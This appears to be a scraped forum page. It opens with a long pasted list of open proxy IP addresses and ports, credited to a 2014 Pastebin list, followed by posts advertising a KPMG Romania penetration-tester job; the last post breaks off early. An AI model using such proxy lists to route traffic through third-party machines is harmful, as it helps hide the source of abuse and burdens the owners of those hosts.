117.162.84.146:8123 117.162.95.159:8123 117.163.109.69:8123 117.163.115.144:8123 117.163.119.129:8123 117.163.197.64:8123 117.163.202.212:8123 117.163.214.238:8123 117.163.216.119:8123 117.164.13.77:8123 117.164.151.112:8123 117.164.156.165:8123 117.164.157.188:8123 117.164.157.60:8123 117.164.158.249:8123 117.164.173.89:8123 117.164.205.150:8123 117.164.222.244:8123 117.164.28.112:8123 117.164.39.190:8123 117.164.58.11:8123 117.166.23.119:8123 117.166.237.137:8123 117.166.243.176:8123 117.166.41.70:8123 
117.166.46.233:8123 117.166.74.162:8123 117.166.95.188:8123 117.166.96.26:8123 117.167.100.247:8123 117.169.207.95:8123 117.170.220.6:8123 117.170.222.231:8123 117.170.226.23:8123 117.170.230.73:8123 117.170.231.15:8123 117.170.231.18:8123 117.170.231.204:8123 117.170.242.116:8123 117.170.242.40:8123 117.170.4.99:8123 117.170.5.153:8123 117.170.5.177:8123 117.170.59.122:8123 117.170.7.95:8123 117.171.103.30:8123 117.171.124.96:8123 117.171.137.177:8123 117.171.162.167:8123 117.171.228.250:8123 117.171.231.2:8123 117.171.235.178:8123 117.171.235.205:8123 117.171.238.250:8123 117.171.26.6:8123 117.171.55.210:8123 117.171.64.214:8123 117.171.67.245:8123 117.173.20.220:8123 117.173.20.247:8123 117.173.20.32:8123 117.173.20.55:8123 117.173.245.229:8123 117.173.249.166:8123 117.173.254.165:8123 117.173.61.251:8123 117.174.1.198:8123 117.174.173.94:8123 117.174.195.207:8123 117.174.198.147:8123 117.174.200.136:8123 117.174.201.108:8123 117.174.209.27:8123 117.174.211.77:8123 117.174.223.247:8123 117.174.227.101:8123 117.174.228.204:8123 117.175.196.170:8123 117.175.212.88:8123 117.175.228.199:8123 117.175.229.134:8123 117.175.229.179:8123 117.175.229.75:8123 117.175.230.180:8123 117.175.241.196:8123 117.175.32.47:8123 117.176.185.24:8123 117.21.192.7:80 117.58.241.15:8080 117.59.217.240:80 117.59.217.240:81 117.59.217.240:82 117.59.217.240:83 118.95.177.186:9064 118.97.172.58:80 118.97.191.206:8080 118.97.66.4:8080 118.97.95.182:8080 118.99.85.7:8080 119.110.71.126:8080 119.254.76.225:808 119.4.115.51:8090 119.4.95.135:80 119.4.95.136:80 119.40.97.2:8080 119.48.23.15:9999 119.6.136.126:80 119.6.136.126:81 119.97.146.152:80 12.167.84.237:8080 120.194.107.149:9999 120.198.243.111:80 120.198.243.113:80 120.198.243.114:80 120.198.243.115:8080 120.198.243.115:8888 120.198.243.116:80 120.198.243.130:80 120.198.243.131:80 120.198.243.14:80 120.198.243.15:80 120.198.243.151:80 120.198.243.48:80 120.198.243.50:80 120.198.243.52:80 120.198.243.78:80 120.198.243.78:81 
120.198.243.79:80 120.198.243.82:80 120.198.243.86:80 120.202.249.230:80 120.203.124.188:8123 120.203.151.29:8123 120.203.154.49:8123 120.203.158.99:8123 120.203.166.88:8123 120.203.173.68:8123 120.203.175.136:8123 120.203.214.144:80 120.203.214.144:81 120.203.214.144:82 120.203.214.144:83 120.203.214.144:84 120.203.214.147:80 120.203.214.147:81 120.203.214.147:82 120.203.214.147:83 120.203.214.147:84 120.203.214.151:80 120.203.214.183:80 120.203.214.187:80 120.203.214.187:9090 120.203.215.11:80 120.203.215.11:81 120.203.215.19:80 120.203.231.212:8123 120.203.232.192:8123 120.203.233.58:8123 120.206.109.21:8123 120.206.111.16:8123 120.206.112.25:8123 120.206.132.22:8123 120.206.132.41:8123 120.206.134.111:8123 120.206.139.70:8123 120.206.140.18:8123 120.206.140.49:8123 120.206.143.237:8123 120.206.143.30:8123 120.206.145.72:8123 120.206.147.125:8123 120.206.176.243:8123 120.206.194.66:8123 120.206.79.218:8123 122.156.137.188:8585 122.227.199.178:9999 122.254.25.136:9064 122.96.59.103:83 122.96.59.103:843 122.96.59.105:80 122.96.59.105:81 122.96.59.105:82 122.96.59.106:82 123.119.164.102:9000 123.150.207.105:80 123.177.20.220:80 123.195.188.190:9064 124.123.244.15:9064 124.123.42.135:9064 124.206.241.221:3128 124.240.187.79:82 124.240.187.79:83 124.240.187.80:80 124.240.187.81:83 124.6.135.170:3128 124.82.27.236:8080 124.88.67.19:80 125.164.125.239:3128 125.209.116.29:8080 125.212.193.2:3128 125.212.216.85:80 125.24.77.62:80 125.24.77.91:8080 125.24.78.154:80 125.24.78.223:8080 125.24.78.98:80 125.24.78.98:8080 125.24.79.234:80 125.24.79.235:8080 125.33.113.49:3128 125.39.66.66:80 125.39.66.67:80 125.39.66.68:80 125.39.66.75:80 125.39.66.75:8080 125.39.66.76:80 125.39.66.76:8080 125.42.176.208:9999 125.88.162.20:9999 125.88.255.143:80 125.88.255.144:80 125.89.74.233:3128 125.89.74.239:3128 125.89.74.240:3128 128.199.224.118:8080 130.0.25.162:8080 130.14.29.110:80 130.14.29.111:80 130.14.29.120:80 130.185.81.141:3128 131.155.186.8:3128 131.72.105.1:8080 
133.18.6.22:80 139.193.62.12:8080 14.114.244.161:9999 14.136.79.252:9064 14.167.9.111:80 14.18.16.71:80 14.18.237.150:8085 140.109.57.11:9590 140.112.214.1:9064 140.113.156.111:9064 140.113.241.221:9064 140.116.88.78:8888 140.119.137.22:9064 140.121.197.169:8080 140.123.122.211:9064 140.129.1.183:3128 140.134.140.57:9064 140.206.86.70:8080 141.85.204.71:1920 146.148.66.106:80 146.185.149.184:3128 149.255.255.242:80 149.255.255.250:80 152.26.69.36:8080 152.26.69.37:8080 154.65.4.90:8080 158.58.172.207:13374 158.58.172.207:14826 158.58.172.207:15692 158.58.172.207:19279 158.58.172.207:33919 158.58.172.207:33948 158.58.172.207:33965 158.58.172.207:34015 158.58.172.207:80 159.255.167.147:8080 162.208.49.45:7808 162.208.49.45:8089 162.243.205.210:3128 163.125.206.206:9999 163.177.79.4:80 163.177.79.5:80 163.28.10.162:8888 163.53.187.98:8080 168.63.255.195:8080 171.12.3.71:81 173.201.185.40:80 175.101.16.72:80 175.101.16.72:8080 175.138.194.103:8080 175.184.250.18:8080 175.99.126.38:80 176.241.83.173:8080 176.73.252.139:3128 176.99.6.237:3128 177.104.25.130:3128 177.124.62.106:3128 177.130.92.69:3128 177.17.167.18:8080 177.200.82.234:8080 177.207.112.140:8080 177.22.111.120:8080 177.223.0.213:8080 177.54.192.163:8080 177.64.93.97:3128 177.67.100.82:8080 177.75.42.33:8080 177.80.18.115:3128 177.99.164.171:8080 177.99.74.182:8080 178.124.157.187:8080 178.137.138.96:8080 178.18.25.151:8888 178.219.248.15:8080 178.254.153.158:8080 178.32.72.26:8089 178.74.68.74:8080 178.77.243.110:443 179.154.253.192:3128 180.109.8.115:8585 180.174.62.185:80 180.176.102.224:9064 180.177.222.51:8088 180.183.25.223:3128 180.183.250.69:8080 180.183.51.139:3128 180.218.44.226:9064 180.242.40.184:8080 180.250.172.182:8080 180.250.215.251:8080 180.250.43.88:8080 180.250.44.250:80 181.208.104.156:9064 181.225.58.104:9064 181.49.15.162:3128 181.72.4.115:9064 181.73.26.240:9064 182.118.23.7:8081 182.18.161.71:3128 182.235.110.89:8088 182.235.133.197:8088 182.235.169.169:9064 182.235.222.142:9064 
182.239.127.137:80 182.239.127.140:80 182.239.95.134:80 182.239.95.136:80 182.239.95.137:80 182.239.95.139:80 182.254.178.190:3128 182.254.212.164:80 182.254.221.192:8080 182.30.3.169:8080 182.36.82.12:8585 182.48.116.51:8080 182.52.49.157:80 182.70.37.75:3128 183.203.12.166:80 183.203.22.68:80 183.203.22.81:80 183.203.22.87:80 183.203.22.90:80 183.203.22.91:80 183.203.22.96:80 183.203.22.97:80 183.203.23.18:80 183.203.8.147:8080 183.203.8.148:8080 183.206.87.177:8123 183.207.224.13:80 183.207.224.14:80 183.207.224.42:80 183.207.224.43:80 183.207.224.44:80 183.207.224.45:80 183.207.224.47:80 183.207.224.48:80 183.207.224.49:80 183.207.224.49:81 183.207.224.50:81 183.207.224.50:85 183.207.224.51:83 183.207.224.51:84 183.207.224.52:80 183.207.224.52:81 183.207.229.12:80 183.207.229.12:8000 183.207.229.13:80 183.207.229.13:9000 183.207.229.139:80 183.207.229.194:80 183.207.229.195:80 183.207.229.199:80 183.207.229.202:80 183.207.229.203:80 183.207.237.11:80 183.207.237.18:80 183.207.237.18:81 183.207.237.21:80 183.208.196.120:8123 183.208.197.72:8123 183.208.200.131:8123 183.208.201.107:8123 183.208.213.193:8123 183.208.214.53:8123 183.208.222.149:8123 183.208.222.53:8123 183.208.35.12:8123 183.209.102.9:8123 183.209.107.226:8123 183.209.7.236:8123 183.211.110.131:8123 183.211.116.163:8123 183.211.5.29:8123 183.211.70.92:8123 183.211.72.156:8123 183.212.85.65:8123 183.212.95.68:8123 183.216.174.60:8123 183.216.176.124:8123 183.216.182.103:8123 183.216.189.171:8123 183.216.31.212:8123 183.216.57.48:8123 183.216.62.5:8123 183.217.140.33:8123 183.217.142.171:8123 183.217.189.61:8123 183.217.202.204:8123 183.217.204.233:8123 183.217.206.200:8123 183.217.232.56:8123 183.217.243.156:8123 183.218.103.32:8123 183.218.108.243:8123 183.218.122.95:8123 183.218.67.18:8123 183.218.85.93:8123 183.219.136.247:8123 183.219.137.144:8123 183.219.138.212:8123 183.219.140.46:8123 183.219.149.178:8123 183.219.153.83:8123 183.219.160.162:8123 183.219.2.65:8123 183.219.247.96:8123 
183.219.248.70:8123 183.219.249.61:8123 183.219.46.155:8123 183.219.5.241:8123 183.219.50.200:8123 183.219.6.122:8123 183.219.83.67:8123 183.219.85.151:8123 183.219.88.140:8123 183.219.89.69:8123 183.219.90.133:8123 183.219.91.24:8123 183.219.94.67:8123 183.220.194.59:8123 183.220.199.223:8123 183.220.240.15:8123 183.220.240.240:8123 183.220.241.218:8123 183.220.245.2:8123 183.220.246.160:8123 183.220.247.135:8123 183.220.247.243:8123 183.220.44.239:8123 183.220.45.139:8123 183.221.147.193:8123 183.221.160.29:8123 183.221.164.91:8123 183.221.174.192:8123 183.221.175.177:8123 183.221.186.167:8123 183.221.188.161:8123 183.221.191.187:8123 183.221.191.198:8123 183.221.191.240:8123 183.221.208.185:8123 183.222.152.197:8123 183.222.153.242:8123 183.222.154.162:8123 183.222.156.12:8123 183.222.156.51:8123 183.222.157.227:8123 183.222.158.10:8123 183.222.158.150:8123 183.222.159.250:8123 183.222.160.21:8123 183.222.161.78:8123 183.222.163.68:8123 183.222.171.236:8123 183.222.174.137:8123 183.222.176.113:8123 183.222.183.37:8123 183.222.255.144:8123 183.222.87.110:8123 183.222.87.239:8123 183.223.16.2:8123 183.223.171.241:8123 183.223.172.31:8123 183.223.173.175:8123 183.223.35.63:8123 183.224.1.30:80 183.224.12.76:80 183.224.12.81:80 183.227.210.73:8123 183.228.142.252:8123 183.228.142.78:8123 183.228.156.176:8123 183.228.176.207:8123 183.228.176.47:8123 183.228.177.3:8123 183.228.179.113:8123 183.228.180.85:8123 183.228.182.71:8123 183.228.200.133:8123 183.228.201.154:8123 183.228.205.64:8123 183.228.206.3:8123 183.228.209.120:8123 183.228.209.6:8123 183.228.210.248:8123 183.228.222.175:8123 183.228.238.59:8123 183.228.239.134:8123 183.228.239.70:8123 183.228.243.115:8123 183.228.243.147:8123 183.228.249.139:8123 183.228.251.7:8123 183.228.39.228:8123 183.228.39.246:8123 183.228.39.68:8123 183.228.40.4:8123 183.228.41.213:8123 183.228.42.183:8123 183.228.68.178:8123 183.228.78.93:8123 183.228.79.184:8123 183.228.88.130:8123 183.228.88.46:8123 183.230.53.153:8123 
183.247.235.21:8123 183.249.23.148:8123 183.249.33.202:8123 183.249.6.133:80 183.57.78.62:8085 183.82.131.183:9064 183.83.108.60:9064 183.83.87.150:9064 183.89.78.116:8080 183.89.92.242:3128 184.105.18.253:8085 186.136.180.233:8080 186.89.130.234:9064 186.89.253.70:8080 186.89.65.213:8080 186.89.90.103:9064 186.90.78.254:9064 186.90.79.190:8080 186.91.95.149:9064 186.92.112.11:8080 186.92.155.55:9064 186.92.163.128:9064 186.92.173.190:9064 186.92.198.65:8080 186.92.199.190:8080 186.92.199.246:8080 186.92.228.141:9064 186.92.4.99:9064 186.92.45.190:8080 186.93.111.198:8080 186.93.153.85:8080 186.93.19.34:9064 186.93.2.196:9064 186.93.203.224:8080 186.93.231.228:8080 186.93.30.229:9064 186.94.127.192:8080 186.94.143.54:8080 186.94.146.142:9064 186.94.190.53:9064 186.94.2.57:8080 186.94.224.8:9064 186.94.225.192:9064 186.94.241.175:9064 186.94.253.225:9064 186.94.34.32:8080 186.94.35.87:9064 186.94.59.50:8080 186.94.64.115:8080 186.95.228.109:8080 186.95.243.202:9064 186.95.47.172:8080 186.95.50.205:9064 186.96.253.146:8080 187.120.34.166:3128 187.120.34.246:3128 187.120.34.25:3128 187.120.34.66:3128 187.72.134.241:3128 187.73.175.23:3128 189.84.176.185:3128 189.85.20.189:8080 190.0.48.2:8080 190.128.238.38:8080 190.153.116.27:8080 190.183.115.148:9064 190.183.177.235:9064 190.184.144.174:8080 190.184.144.78:8080 190.198.134.200:9064 190.198.154.226:8080 190.198.178.228:9064 190.198.180.106:9064 190.198.2.148:8080 190.198.216.80:8080 190.198.227.114:8080 190.198.254.141:8080 190.198.27.169:9064 190.198.27.97:9064 190.198.80.240:8080 190.199.183.246:9064 190.199.218.90:8080 190.199.67.95:8080 190.199.71.123:9064 190.200.155.27:8080 190.200.157.6:8080 190.200.16.228:9064 190.200.185.216:9064 190.200.189.115:9064 190.200.217.151:8080 190.201.142.135:8080 190.201.154.134:9064 190.201.165.152:9064 190.201.167.141:9064 190.201.170.94:9064 190.201.216.72:9064 190.201.40.238:9064 190.202.194.152:9064 190.202.244.165:8080 190.203.132.250:8080 190.203.201.100:8080 
190.203.239.67:8080 190.203.43.97:9064 190.204.1.2:9064 190.204.101.28:8080 190.204.122.129:8080 190.204.160.33:8080 190.204.168.253:8080 190.204.173.227:8080 190.204.242.235:8080 190.204.255.232:8080 190.204.26.213:9064 190.204.29.122:9064 190.204.55.110:9064 190.204.67.235:9064 190.205.123.55:8080 190.205.127.253:8080 190.205.192.9:8080 190.205.193.204:9064 190.205.196.77:9064 190.205.202.104:8080 190.205.220.126:8080 190.205.225.226:9064 190.207.149.102:8080 190.207.185.119:8080 190.207.200.185:8080 190.207.203.228:8080 190.207.208.168:9064 190.207.219.164:3128 190.207.228.97:9064 190.207.24.170:8080 190.207.253.107:9064 190.207.34.65:8080 190.207.56.83:9064 190.207.63.222:8080 190.217.215.194:9064 190.36.11.61:9064 190.36.143.123:8080 190.36.152.23:9064 190.36.154.15:8080 190.36.214.44:8080 190.36.72.1:9064 190.36.8.130:9064 190.36.8.26:9064 190.37.122.118:8080 190.37.122.163:8080 190.37.164.82:9064 190.37.165.72:9064 190.37.211.186:9064 190.37.224.236:8080 190.37.225.158:8080 190.37.231.178:8080 190.37.232.155:8080 190.37.239.21:9064 190.37.34.104:8080 190.37.48.121:8080 190.37.57.100:8080 190.37.77.86:8080 190.38.122.59:9064 190.38.123.239:9064 190.38.157.98:9064 190.38.178.28:8080 190.38.218.87:8080 190.38.29.145:9064 190.38.44.178:8080 190.38.45.9:8080 190.38.5.195:8080 190.38.54.32:8080 190.38.64.85:8080 190.38.68.219:8080 190.38.88.204:9064 190.38.94.86:8080 190.38.97.254:9064 190.39.105.142:9064 190.39.107.127:8080 190.39.169.183:9064 190.39.252.172:9064 190.39.67.73:8080 190.39.68.174:8080 190.39.75.247:8080 190.39.94.169:8080 190.40.123.36:8080 190.44.73.74:9064 190.52.32.126:3128 190.72.120.118:9064 190.72.15.242:8080 190.72.15.87:8080 190.72.153.86:8080 190.72.157.20:9064 190.72.191.194:9064 190.72.225.106:8080 190.72.6.206:9064 190.73.105.81:8080 190.73.11.143:8080 190.73.185.34:9064 190.73.216.119:8080 190.73.233.182:8080 190.73.252.90:9064 190.73.96.171:8080 190.74.146.224:8080 190.74.162.46:9064 190.74.165.158:8080 190.74.165.207:9064 
190.74.168.149:8080 190.74.180.79:8080 190.74.186.36:9064 190.74.199.171:8080 190.74.200.117:9064 190.74.202.231:9064 190.74.203.4:8080 190.74.90.109:9064 190.75.137.251:9064 190.75.139.217:8080 190.75.139.61:9064 190.75.194.53:8080 190.75.206.79:9064 190.75.211.152:9064 190.75.238.227:9064 190.75.239.216:9064 190.75.33.152:9064 190.75.35.65:8080 190.77.219.159:8080 190.77.221.130:9064 190.77.230.141:8080 190.77.245.52:9064 190.78.151.16:9064 190.78.178.185:9064 190.78.178.6:8080 190.78.23.90:8080 190.78.24.108:9064 190.78.98.178:9064 190.78.99.152:9064 190.79.105.115:8080 190.79.107.130:9064 190.79.151.178:8080 190.79.222.12:9064 190.79.6.136:9064 190.94.202.13:9064 190.94.216.250:9064 190.98.205.107:80 191.105.121.101:9064 191.240.57.212:8080 191.241.76.52:8080 191.37.238.135:8080 191.37.238.169:8080 192.163.255.175:3128 192.3.104.245:80 192.3.162.138:3128 192.99.3.129:3128 194.125.224.125:3128 194.126.140.247:80 194.186.43.22:3128 194.213.60.227:8585 194.247.12.106:3128 194.247.165.118:8080 194.44.153.89:3128 194.8.248.22:3128 195.114.125.81:8080 195.154.77.104:3128 198.251.67.194:8080 198.46.103.108:80 198.52.217.44:7808 198.52.217.44:8089 198.71.193.192:80 198.71.213.94:80 199.167.228.36:80 199.200.120.140:8089 199.200.120.36:7808 199.200.120.37:7808 200.109.137.60:8080 200.112.211.16:8080 200.124.112.24:3128 200.143.198.83:3128 200.174.182.103:8080 200.192.248.94:8080 200.223.4.138:8081 200.242.145.3:3128 200.69.206.157:8080 200.90.86.38:8080 200.93.69.164:9064 201.208.204.219:9064 201.208.30.218:8080 201.208.37.148:8080 201.209.198.47:9064 201.209.220.178:8080 201.209.233.75:9064 201.209.240.8:9064 201.209.31.248:8080 201.209.47.77:9064 201.209.53.85:9064 201.210.222.209:9064 201.210.233.167:8080 201.210.249.226:9064 201.210.69.228:8080 201.211.109.142:8080 201.211.120.56:8080 201.211.129.156:9064 201.22.217.194:8080 201.221.131.62:8080 201.221.131.92:8080 201.221.132.69:3128 201.221.133.182:8080 201.238.203.66:3128 201.240.215.147:3128 201.242.185.129:8080 
201.242.80.177:8080 201.242.93.133:9064 201.242.93.177:8080 201.243.104.100:9064 201.243.111.111:9064 201.243.126.125:8080 201.243.16.66:8080 201.243.175.209:9064 201.243.207.40:9064 201.243.96.183:8080 201.243.96.251:8080 201.248.18.112:8080 201.248.9.40:9064 201.55.143.1:3128 202.103.150.70:8088 202.108.50.75:80 202.109.163.75:8085 202.112.114.27:3128 202.117.1.122:8080 202.120.188.104:80 202.133.104.106:80 202.133.104.106:8080 202.141.225.126:8080 202.152.6.10:80 202.152.6.10:8080 202.152.61.44:8080 202.169.225.204:80 202.169.225.204:8080 202.171.253.134:80 202.171.253.135:80 202.171.253.72:80 202.171.253.84:85 202.171.253.84:86 202.29.238.242:3128 202.53.170.134:8080 202.77.115.71:54321 202.78.206.83:8080 202.91.73.30:8080 202.99.172.244:3128 203.128.71.247:8080 203.151.21.184:3128 203.176.136.66:8080 203.195.132.244:3128 203.202.250.98:3128 203.73.233.144:8088 203.81.67.86:8080 207.108.136.68:443 209.150.233.83:80 210.101.131.232:8080 210.13.105.23:8080 210.140.155.65:80 210.186.158.210:9064 210.209.72.236:80 210.245.20.170:80 210.65.10.76:3128 210.70.253.27:3128 210.73.218.136:3128 210.82.92.77:3128 211.138.121.37:80 211.138.121.37:81 211.138.121.37:82 211.138.121.37:83 211.138.121.37:84 211.138.121.38:80 211.138.121.38:81 211.138.121.38:82 211.138.121.38:83 211.138.60.16:80 211.138.60.18:80 211.139.45.22:8123 211.143.146.239:80 211.143.146.239:82 211.143.146.239:83 211.143.146.239:843 211.155.230.38:808 211.166.8.27:80 212.156.157.86:8080 212.158.155.22:8080 212.200.131.83:80 212.200.131.83:8080 216.120.236.190:3128 217.12.215.22:3128 218.108.232.99:80 218.166.101.107:8088 218.173.47.80:9064 218.173.73.10:9064 218.201.21.142:80 218.201.21.145:80 218.201.21.148:80 218.201.21.153:80 218.201.38.49:80 218.203.13.169:80 218.203.13.169:81 218.203.13.169:82 218.203.13.169:83 218.203.13.169:84 218.203.13.172:80 218.203.13.173:80 218.203.13.175:80 218.203.13.176:80 218.203.13.177:80 218.204.120.37:8123 218.204.156.111:8123 218.204.159.57:8123 218.206.83.89:80 
218.207.10.178:8123 218.207.17.163:8123 218.207.172.236:80 218.207.172.237:80 218.207.51.19:8123 218.207.52.55:8123 218.207.55.162:8123 218.26.13.155:63000 218.27.136.169:8085 218.28.96.39:3128 218.29.155.198:9999 218.29.90.30:9999 218.75.205.124:9999 218.75.205.57:9999 219.93.183.106:8080 220.129.173.150:9064 220.136.166.222:9064 220.173.235.202:9999 220.231.32.195:3128 221.0.182.5:808 221.172.143.166:9000 221.176.14.72:80 221.178.119.219:8123 221.178.119.233:8123 221.178.121.198:8123 221.178.124.80:8123 221.178.127.170:8123 221.178.24.55:8123 221.178.28.215:8123 221.178.29.169:8123 221.178.30.200:8123 221.178.30.253:8123 221.178.30.30:8123 221.178.32.109:8123 221.178.53.85:8123 221.178.54.134:8123 221.178.55.55:8123 221.178.78.102:8123 221.178.83.50:8123 221.178.84.49:8123 221.178.86.157:8123 221.178.86.224:8123 221.178.98.82:8123 221.178.99.130:8123 221.180.130.48:80 221.180.130.49:80 221.180.130.50:80 221.180.130.51:80 221.180.147.30:80 221.180.147.30:81 221.180.147.30:83 221.180.147.30:86 221.182.110.141:8123 221.182.62.114:9999 221.182.62.32:8123 221.182.74.154:8123 221.182.74.46:8123 221.182.75.186:8123 221.182.75.205:8123 221.182.75.80:8123 221.183.16.219:80 221.231.135.149:80 221.5.69.51:80 221.5.69.51:8000 222.124.149.178:3128 222.129.205.199:9000 222.132.29.10:8080 222.246.232.55:80 222.35.17.177:8080 222.50.14.100:9000 222.66.97.75:8080 222.85.1.123:8118 222.85.103.192:81 222.85.149.4:3128 222.88.236.236:81 222.88.236.236:82 222.88.236.236:83 222.88.242.213:9999 223.252.33.209:23684 223.66.80.235:8123 223.67.148.169:8123 223.82.14.151:8123 223.82.169.151:8123 223.82.171.161:8123 223.82.171.176:8123 223.82.203.120:8123 223.82.204.182:8123 223.82.217.177:8123 223.82.217.28:8123 223.82.218.166:8123 223.82.37.67:8123 223.82.39.59:8123 223.82.42.148:8123 223.82.67.22:8123 223.82.74.214:8123 223.83.136.97:8123 223.83.137.26:8123 223.83.141.95:8123 223.83.201.241:8123 223.83.206.200:8123 223.84.130.224:8123 223.84.131.211:8123 223.84.133.12:8123 
223.84.138.112:8123 223.84.143.179:8123 223.84.145.42:8123 223.84.147.193:8123 223.84.160.160:8123 223.84.19.45:8123 223.84.195.89:8123 223.84.206.174:8123 223.84.206.44:8123 223.84.216.238:8123 223.84.221.130:8123 223.84.229.77:8123 223.84.232.62:8123 223.84.82.206:8123 223.86.122.39:8123 223.86.127.219:8123 223.86.127.27:8123 223.86.127.57:8123 223.86.171.47:8123 223.86.215.67:8123 223.86.216.148:8123 223.86.217.177:8123 223.86.217.37:8123 223.86.218.118:8123 223.86.218.22:8123 223.86.219.193:8123 223.86.223.179:8123 223.86.3.124:8123 223.86.32.6:8123 223.86.40.248:8123 223.86.6.44:8123 223.86.66.238:8123 223.86.67.105:8123 223.86.67.61:8123 223.86.7.110:8123 223.86.7.221:8123 223.86.7.51:8123 223.86.7.63:8123 223.86.72.148:8123 223.86.9.83:8123 223.87.108.106:8123 223.87.114.209:8123 223.87.159.77:8123 223.87.183.43:8123 223.87.62.203:8123 223.87.76.128:8123 223.99.188.73:8090 223.99.188.74:8090 23.226.131.196:8080 23.232.196.1:80 23.232.196.10:80 23.232.196.13:80 23.232.196.14:80 23.232.196.2:80 23.232.196.4:80 27.109.140.205:80 27.115.18.18:8080 27.131.190.66:8080 27.131.47.131:8080 27.145.145.105:8080 27.187.155.71:8088 27.3.142.237:9064 27.5.192.190:9064 27.50.128.242:88 31.15.48.12:80 31.3.246.183:7080 31.7.232.102:3128 36.224.219.91:8088 36.226.118.20:9064 36.227.225.141:8088 36.227.4.45:8088 36.231.127.68:8088 36.250.69.4:80 36.250.74.87:80 36.250.74.88:80 36.73.141.145:31281 36.74.37.6:8888 36.78.128.251:31281 36.80.35.69:8080 37.131.208.141:8080 37.157.192.146:3128 37.236.167.250:80 37.239.46.10:80 37.239.46.18:80 37.239.46.50:80 37.239.46.58:80 37.60.66.108:8080 37.60.66.109:8080 41.188.49.163:3128 41.73.230.39:8080 41.89.96.36:3128 42.117.3.73:3128 42.202.146.58:8080 42.62.61.245:80 46.32.231.84:80 49.113.241.95:8585 49.204.134.166:9064 49.204.176.99:9064 49.207.213.194:9064 49.207.217.125:9064 49.207.227.208:9064 49.207.29.74:9064 5.102.108.198:80 5.135.98.240:80 5.153.230.44:80 5.196.5.145:3128 58.146.102.176:9064 58.248.156.53:9999 
58.248.156.54:9999 58.248.80.61:9999 58.248.81.11:9999 58.251.78.71:8088 58.252.0.25:9999 58.253.238.242:80 58.253.238.243:80 58.42.236.241:80 58.64.130.14:8080 58.64.130.18:8080 58.96.168.83:9999 59.115.10.115:9064 59.12.160.20:3128 59.151.103.14:80 59.151.103.15:80 59.188.252.249:3128 59.46.72.245:8080 60.12.11.60:808 60.12.69.110:80 60.190.138.151:80 60.207.166.152:80 60.21.132.218:63000 60.213.189.170:3988 60.214.67.86:9999 60.221.253.204:80 60.55.43.74:80 61.133.51.6:9999 61.149.182.102:8080 61.155.169.11:808 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.172.44.138:9999 61.19.114.178:8080 61.19.121.121:3128 61.19.121.154:3128 61.19.30.198:8080 61.19.42.244:8080 61.19.69.252:8080 61.219.16.16:8888 61.223.145.222:9064 61.227.218.171:3128 61.228.146.138:8088 61.228.233.132:9064 61.230.107.88:8088 61.230.21.131:8088 61.234.123.64:8080 61.58.84.209:8088 62.103.107.9:80 62.108.122.173:3128 64.31.22.131:7808 64.31.22.131:8089 64.74.219.86:80 65.49.14.147:3080 65.49.14.147:3128 66.10.94.36:80 66.10.94.36:8080 66.135.118.156:80 66.162.208.10:3128 66.192.33.78:3128 66.192.33.78:8080 67.148.11.168:443 74.253.21.252:8080 74.50.126.248:7808 74.50.126.248:8089 74.50.126.249:7808 74.50.126.249:8089 75.133.69.131:8080 76.76.105.124:3128 78.107.199.67:8080 79.106.108.139:8080 80.82.69.72:3128 83.246.129.250:3128 88.156.27.199:8080 88.198.24.108:3128 89.191.131.243:8080 89.232.139.253:80 89.249.207.65:3128 89.46.101.122:7808 89.46.101.122:8089 91.218.230.152:3128 91.227.93.20:80 91.238.29.192:9999 93.115.8.229:7808 93.115.8.229:8089 93.188.166.85:80 93.85.92.109:3128 93.87.74.182:8080 94.180.115.232:80 94.198.38.20:8080 94.247.174.117:18080 95.167.39.34:8080 95.65.22.132:3128 95.86.133.141:3128 98.103.146.102:80

Source: 08-11-14 | Fast Proxy Server List (1655) - Pastebin.com
  7. Company: KPMG - On my team. IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: Career news & insights | KPMG | RO

Who are we?
KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early '90s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets.

What are we looking for?
An IT Security Consultant (Penetration Tester / Ethical Hacker) for our IT Advisory team.

Job profile:
• Conduct technical security assessments and information security projects which require expertise in one or more of the following areas: Penetration Testing / Ethical Hacking, Vulnerability Assessments and IT Security Audits;
• Identify and exploit technical vulnerabilities in clients' systems, assess the business risks of the technical vulnerabilities and communicate them to client personnel;
• Perform security configuration analysis for various operating systems, especially Windows and Linux / UNIX;
• This is a position in the Penetration Testers Team which requires quick learning and working with new technologies, tools and techniques.

Some typical projects that you will work on (depending on your expertise) are:
• Web application penetration testing: try to find vulnerabilities in web applications (e.g. Internet Banking, eCommerce websites, web portals, etc.) and report them to the clients. Try to exploit these vulnerabilities in order to prove their business impact.
• Internal network penetration testing: simulate a malicious person who already has access to the internal network of the customer (e.g. visitor, consultant, etc.). Starting only from simple network port access, you will have to gain access to sensitive information from the client's internal network, gain Domain Admin access or reach other flags.
• Mobile application penetration testing: try to find vulnerabilities in mobile applications (Android, iOS, Windows Phone) and suggest corrective measures in order to improve their security.
• Other types of technical projects that will involve your imagination and out-of-the-box thinking may also occur.
• It is sometimes required to make demonstrations and presentations to clients.
• We encourage technical research and presenting our results at hacking conferences, local and international.

Specific requirements:
• Since IT Security is a multidisciplinary field, we are looking for a person who has a broader understanding of technical concepts from one or more of the following areas: web applications, system administration, networking, software development.
• In order to understand the technical level that we need, here are a few terms/concepts that we expect you to be familiar with: OWASP Top 10, HTTP protocol, SSL, SQL, JavaScript, buffer overflow, TCP/IP, DNS, Wireshark, nmap, Linux shell commands, Kali and others.
• You also must be able to express your findings in very good technical and business English (oral and written).
• Other desired requirements are:
- Bachelor's degree in an IT related field;
- Hands-on experience in at least one of the following: security testing, web application development/testing, system administration, networking, software development;
- Work effectively either individually or as a member of a multi-skilled team;
- Professional discipline, accuracy, reliability and excellent analytic skills;
- Strong interpersonal skills, team spirit, resilience, flexibility, adaptability and self-motivation.

Will be considered a plus: certifications such as OSCP, OSCE, CEH, LPT, CCNA, MCSE.

Note: I can provide any kind of (non-confidential) information. PM me if you are interested.

Bestjobs: IT Security Consultant at S.C. KPMG ROMANIA SRL, BUCURESTI - BestJobs
  8. Company: KPMG Romania (where I also work) IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to: Career news & insights | KPMG | RO

Who are we?
